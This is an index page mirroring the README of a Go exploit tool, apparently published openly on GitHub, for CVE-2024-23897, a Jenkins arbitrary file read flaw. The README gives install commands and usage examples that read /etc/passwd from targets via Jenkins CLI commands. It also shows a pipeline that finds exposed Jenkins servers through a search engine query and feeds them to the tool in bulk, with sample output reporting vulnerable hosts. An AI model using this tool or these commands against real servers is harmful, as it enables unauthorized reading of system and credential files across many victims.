Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/wjlin0/CVE-2024-23897

CVE-2024-23897 - Jenkins 任意文件读取利用工具
https://github.com/wjlin0/CVE-2024-23897

cve cve-2024-23897 jenkins

Last synced: 3 months ago
JSON representation

CVE-2024-23897 - Jenkins 任意文件读取利用工具

Host: GitHub
URL: https://github.com/wjlin0/CVE-2024-23897
Owner: wjlin0
License: mit
Created: 2024-01-27T19:34:48.000Z (11 months ago)
Default Branch: main
Last Pushed: 2024-03-16T07:55:41.000Z (9 months ago)
Last Synced: 2024-06-21T17:02:15.492Z (6 months ago)
Topics: cve, cve-2024-23897, jenkins
Language: Go
Homepage:
Size: 77.1 KB
Stars: 62
Watchers: 2
Forks: 10
Open Issues: 0
Metadata Files:
- Readme: README.md
- License: LICENSE

Awesome Lists containing this project

awesome-hacking-lists - wjlin0/CVE-2024-23897 - CVE-2024-23897 - Jenkins 任意文件读取利用工具 (Go)

README

CVE-2024-23897 - Jenkins 任意文件读取利用工具

# 安装

CVE-2024-23897 需要`go 1.21`才能完成安装执行以下命令

```shell
go install github.com/wjlin0/CVE-2024-23897/cmd/CVE-2024-23897@latest
```
或者
安装完成的二进制文件在[release](https://github.com/wjlin0/CVE-2024-23897/releases)中下载
- [macOS-arm64](https://github.com/wjlin0/CVE-2024-23897/releases/download/v1.0.2/CVE-2024-23897_1.0.2_macOS_arm64.zip)

- [macOS-amd64](https://github.com/wjlin0/CVE-2024-23897/releases/download/v1.0.2/CVE-2024-23897_1.0.2_macOS_amd64.zip)

- [linux-amd64](https://github.com/wjlin0/CVE-2024-23897/releases/download/v1.0.2/CVE-2024-23897_1.0.2_linux_amd64.zip)

- [windows-amd64](https://github.com/wjlin0/CVE-2024-23897/releases/download/v1.0.2/CVE-2024-23897_1.0.2_windows_amd64.zip)

- [windows-386](https://github.com/wjlin0/CVE-2024-23897/releases/download/v1.0.2/CVE-2024-23897_1.0.2_windows_386.zip)

# 使用
```shell
CVE-2024-23897 -help
```
```text
CVE-2024-23897 is a tool for scanning for CVE-2024-23897

Usage:
CVE-2024-23897 [flags]

Flags:
INPUT:
-url, -u string[] URL to scan. (e.g. -u https://example.com)
-list string[] File containing list of URLs to scan. (e.g. -list list.txt)

CONFIG:
-c, -command string[] JinKens Command to run. (e.g. -c 'who-am-i')
-a, -args string[] JinKens Command args.
-e, -exec JinKens Execute command.
-lac, -list-available-commands List available commands.

OUTPUT:
-no-color Don't Use colors in output

DEBUG:
-debug Enable debugging
-p, -proxy string[] list of http/socks5 proxy to use (comma separated or file input)
-irt, -input-read-timeout value timeout on input read (default 3m0s)
-version show version of CVE-2024-23897 tool
-header string[] Add custom headers(or on file contents) to the request(e.g. -header 'Cookie: username=admin' or -header header.txt)
-no-stdin disable stdin processing

LIMIT:
-timeout int time to wait in seconds before timeout (default 10)
-t, -thread int Number of concurrent threads (default 30)
-rl, -rate-limit int Rate limit for enumeration speed (n req/sec) (default -1)

UPDATE:
-update Update tool
-duc, -disable-update-check Disable update check

Examples:
Run CVE-2024-23897 check vulnerability on a single targets
$ CVE-2024-23897 -url https://example.com

Run CVE-2024-23897 check vulnerability on list of targets
$ CVE-2024-23897 -list list.txt

Run CVE-2024-23897 read full file contents on a single targets
$ CVE-2024-23897 -url https://example.com -c reload-job -a /etc/passwd

Run CVE-2024-23897 read available commands on a single targets
$ CVE-2024-23897 -url https://example.com -lac

Run CVE-2024-23897 execute the JenKings command
$ CVE-2024-23897 -url https://example.com -c reload-job -a job_name -exec

Run CVE-2024-23897 check vulnerability on a single targets by proxy server
$ CVE-2024-23897 -url https://example.com -proxy http://127.0.0.1:7890

Run CVE-2024-23897 on uncovering Jenkins check vulnerability
$ pathScan -ue 'quake' -uq 'app: "Jenkins"' -uc -silent | CVE-2024-23897

```

use pathScan to collect targets and pass them to CVE-2024-23897 via standard input

```shell
pathScan -ue 'quake' -uq 'app: "Jenkins"' -uc -silent | CVE-2024-23897
```
> To protect your privacy, I have deleted some outputs
```text
➜ ~ pathScan -ue 'quake' -uq 'app: "Jenkins"' -uc -silent | CVE-2024-23897

_______ ________ ___ ____ ___ __ __ ___ _____ ____ ____ _____
/ ____| | / / ____/ |__ \/ __ |__ \/ // / |__ \|__ /( __ )/ __ /__ /
/ / | | / / __/________/ / / / __/ / // /_________/ / /_ __ / /_/ / / /
/ /___ | |/ / /__/_____/ __/ /_/ / __/__ __/_____/ __/___/ / /_/ /\__, / / /
\____/ |___/_____/ /____\____/____/ /_/ /____/____/\____//____/ /_/

Jenkins 任意文件读取漏洞
wjlin0.com

慎用。你要为自己的行为负责
开发者不承担任何责任，也不对任何误用或损坏负责.

[INF] Loaded 50 targets from input
[CVE-2024-23897] https://example.com
Mode: Check Mode
The target is Vulnerable.
please use command and to read file first content.
$ CVE-2024-23897 -u https://example.com -c who-am-i -a /etc/passwd

[CVE-2024-23897] https://example.com
Mode: Check Mode
The target is Vulnerable && This cab read full file contents
please use command and to read full body
$ CVE-2024-23897 -u https://example.com -c connect-node -a /etc/passwd
......
......
......
......
......
[INF] took 92.75 seconds with 13 successful requests
```

# 漏洞分析
> If you want to learn more about the vulnerability details, you can check out phith0n analysis of this vulnerability.

- [Jenkins 任意文件读取漏洞分析](https://www.leavesongs.com/PENETRATION/jenkins-cve-2024-23897.html)

Ecosyste.ms: Awesome

https://github.com/wjlin0/CVE-2024-23897

Awesome Lists containing this project

README

CVE-2024-23897 - Jenkins 任意文件读取 利用工具

CVE-2024-23897 - Jenkins 任意文件读取利用工具